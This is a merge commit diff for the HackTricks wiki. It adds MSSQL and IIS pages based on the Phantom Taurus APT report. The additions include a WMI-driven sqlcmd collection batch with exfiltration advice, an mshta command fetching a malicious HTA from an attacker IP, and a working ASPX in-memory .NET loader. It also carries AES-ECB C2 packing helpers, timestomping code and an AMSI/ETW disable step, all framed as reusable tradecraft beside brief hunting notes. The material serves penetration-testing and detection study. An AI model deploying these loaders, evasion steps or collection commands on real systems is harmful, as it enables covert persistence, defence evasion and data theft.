Merge pull request #1448 from HackTricks-wiki/update_Phantom_Taurus__A_New_Chinese_Nexus_APT_and_the_Di_20250930_124606

Phantom Taurus A New Chinese Nexus APT and the Discovery of ...
2025-10-10 18:36:50 +00:00 · 2025-09-30 23:01:25 +02:00 · 2025-09-30 23:01:25 +02:00 · 763f78116d
commit 763f78116d
parent a96eb96d2e b87b39b58c
6 changed files with 154 additions and 5 deletions
--- a/searchindex.js
+++ b/searchindex.js
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -104,6 +104,7 @@
 # 🐧 Linux Hardening
 - [Linux Basics](linux-hardening/linux-basics.md)
 - [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 - [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
  - [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
--- a/src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md
+++ b/src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md
@ -1,6 +1,6 @@
 # FreeBSD ptrace RFI and vm_map PROT_EXEC bypass (PS5 case study)
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
 ## Overview
@ -196,4 +196,4 @@ int main(){
 - [gdbsrv](https://github.com/ps5-payload-dev/gdbsrv)
 - [FreeBSD klog reference](https://lists.freebsd.org/pipermail/freebsd-questions/2006-October/134233.html)
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
--- a/src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
+++ b/src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
@ -1,6 +1,6 @@
 # POSIX CPU Timers TOCTOU race (CVE-2025-38352)
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
 This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.
@ -210,4 +210,4 @@ Notes for exploitation research
 - [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
 - [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@ -253,6 +253,41 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
 ```
 ### WMI-based remote SQL collection (sqlcmd + CSV export)
 Operators can pivot from an IIS/app tier to SQL Servers using WMI to execute a small batch that authenticates to MSSQL and runs ad‑hoc queries, exporting results to CSV. This keeps collection simple and blends with admin activity.
 Example mssq.bat
 ```bat
@echo off
 rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
 set S=%1
 set U=%2
 set P=%3
 set Q=%4
 set O=%5
 rem Remove headers, trim trailing spaces, CSV separator = comma
 sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"
 ```
 Invoke it remotely with WMI
 ```cmd
 wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
 ```
 PowerShell alternative
 ```powershell
 $cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
 Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd
 ```
 Notes
 - sqlcmd may be missing; fall back to osql, PowerShell Invoke-Sqlcmd, or a one‑liner using System.Data.SqlClient.
 - Use quoting carefully; long/complex queries are easier to supply via a file or Base64‑encoded argument decoded inside the batch/PowerShell stub.
 - Exfil the CSV via SMB (e.g., copy from \\SQLHOST\C$\Windows\Temp) or compress and move through your C2.
 ### Get hashed passwords
 ```bash
@ -631,6 +666,18 @@ You probably will be able to **escalate to Administrator** following one of thes
 ## References
 - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
 - [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
 - [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
 - [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
 - [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
 - [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
 - [https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
--- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@ -229,8 +229,105 @@ If you have filesystem or interactive access on the web server, co-located keys
 With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised.
 ## IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
 The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation entirely inside w3wp.exe. The core ideas are broadly reusable for custom tradecraft and for detection/hunting.
 Key building blocks
 - ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) carries a Base64‑encoded, optionally Gzip‑compressed .NET DLL. Upon a trigger request it decodes, decompresses and reflectively loads it into the current AppDomain and invokes the main entry point (e.g., ServerRun.Run()).
 - Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results are wrapped with Gzip → AES‑ECB/PKCS7 → Base64 and moved via seemingly legitimate cookie‑heavy requests; operators used stable delimiters (e.g., "STAR") for chunking.
 - Reflective .NET execution: accept arbitrary managed assemblies as Base64, load via Assembly.Load(byte[]) and pass operator args for rapid module swaps without touching disk.
 - Operating in precompiled ASP.NET sites: add/manage auxiliary shells/backdoors even when the site is precompiled (e.g., dropper adds dynamic pages/handlers or leverages config handlers) – exposed by commands such as bypassPrecompiledApp, addshell, listshell, removeshell.
 - Timestomping/metadata forgery: expose a changeLastModified action and timestomp on deployment (including future compilation timestamps) to hinder DFIR.
 - Optional AMSI/ETW pre‑disable for loaders: a second‑stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in‑memory payloads.
 Minimal ASPX loader pattern
 ```aspx
 <%@ Page Language="C#" %>
 <%@ Import Namespace="System" %>
 <%@ Import Namespace="System.IO" %>
 <%@ Import Namespace="System.IO.Compression" %>
 <%@ Import Namespace="System.Reflection" %>
 <script runat="server">
 protected void Page_Load(object sender, EventArgs e){
    // 1) Obtain payload bytes (hard‑coded blob or from request)
    string b64 = /* hardcoded or Request["d"] */;
    byte[] blob = Convert.FromBase64String(b64);
    // optional: decrypt here if AES is used
    using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
        using(var ms = new MemoryStream()){
            gz.CopyTo(ms);
            var asm = Assembly.Load(ms.ToArray());
            // 2) Invoke the managed entry point (e.g., ServerRun.Run)
            var t = asm.GetType("ServerRun");
            var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
            object inst = m.IsStatic ? null : Activator.CreateInstance(t);
            m.Invoke(inst, new object[]{ HttpContext.Current });
        }
    }
 }
 </script>
 ```
 Packing/crypto helpers (Gzip + AES‑ECB + Base64)
 ```csharp
 using System.Security.Cryptography;
 static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
    using(var aes = Aes.Create()){
        aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
        ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
        return t.TransformFinalBlock(data, 0, data.Length);
    }
 }
 static string Pack(object obj, byte[] key){
    // serialize → gzip → AES‑ECB → Base64
    byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
    using var ms = new MemoryStream();
    using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
    byte[] enc = AesEcb(ms.ToArray(), key, true);
    return Convert.ToBase64String(enc);
 }
 static T Unpack<T>(string b64, byte[] key){
    byte[] enc = Convert.FromBase64String(b64);
    byte[] cmp = AesEcb(enc, key, false);
    using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
    using var outMs = new MemoryStream(); gz.CopyTo(outMs);
    return Deserialize<T>(outMs.ToArray());
 }
 ```
 Cookie/session flow and command surface
 - Session bootstrap and tasking are carried via cookies to blend with normal web activity.
 - Commands observed in the wild included: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and dynamic execution primitives code_self, code_pid, run_code for in‑memory .NET execution.
 Timestomping utility
 ```csharp
 File.SetCreationTime(path, ts); 
 File.SetLastWriteTime(path, ts);
 File.SetLastAccessTime(path, ts);
 ```
 Inline AMSI/ETW disable before Assembly.Load (loader variant)
 ```csharp
 // Patch amsi!AmsiScanBuffer to return E_INVALIDARG
 // and ntdll!EtwEventWrite to a stub; then load operator assembly
 DisableAmsi();
 DisableEtw();
 Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });
 ```
 See AMSI/ETW bypass techniques in: windows-hardening/av-bypass.md
 Hunting notes (defenders)
 - Single, odd ASPX page with very long Base64/Gzip blobs; cookie‑heavy posts.
 - Unbacked managed modules inside w3wp.exe; strings like Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
 - Repeated delimiters like "STAR" in traffic; mismatched or even future timestamps on ASPX/assemblies.
 ## Old IIS vulnerabilities worth looking for
 ### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure
 You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
@ -300,4 +397,9 @@ HTTP/1.1 401 Unauthorized
 HTTP/1.1 200 OK
 ```
 ## References
 - [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
 - [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)
 {{#include ../../banners/hacktricks-training.md}}